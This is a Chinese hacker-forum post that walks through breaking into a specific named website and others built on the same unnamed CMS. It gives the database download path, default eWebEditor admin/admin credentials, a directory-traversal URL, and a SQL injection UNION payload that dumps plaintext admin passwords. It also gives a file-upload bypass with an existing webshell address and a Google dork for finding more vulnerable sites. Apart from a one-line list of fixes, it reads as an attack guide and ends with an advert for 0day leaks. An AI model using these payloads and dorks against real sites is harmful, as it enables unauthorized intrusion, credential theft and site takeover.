通用网站系统漏洞及修复方法

 

今天在测试渗透一网站时，旁注发现这套程序。版权未知。
问题很多，发出来大家了解下。

请勿非法入侵他人网站/系统，否则后果自负！

默认网站数据库：

http://www.08.tv/data/nxnews.mdb (做为一个合格的站长，这个不用说怎么做了吧？)

ewebeditor 在线编辑器：

http://www.08.tv/ewebeditor/admin_login.asp
帐户/密码：admin admin

登陆后可遍历目录：ewebedtior/admin_uploadfile.asp?id=22&dir=../../data

Sql注入漏洞：

http://www.08.tv/detail.asp?id=12
exp:
union select 1,admin,password,4,5,6,7,8 from admin
爆出明文帐号/密码

上传漏洞：

http://www.08.tv/manage/upfile.asp 传说中的双文件上传。当然，你也可以用工具。如明小子。
webshell: http://www.08.tv/manage/tupian/201108102214.asp

简单修复：修改默认数据库、后台路径/删除ewebedtior目录下admin_login.asp/增加防注入系统/对upfile.asp作验证

google:inurl:news.asp?lanmuName=

 

京华志： 这样的漏洞 一般是属于最初级的了 但是往往有很多站长不注意 所以还能拿下很多站的 如果想更快 更精准的获取更多BUG 0DAY

漏洞信息 请关注京华志  www.jinghuazhi.com



本文来源于：凯里黑客http://www.0855.tv ，转载请注明来处，谢谢！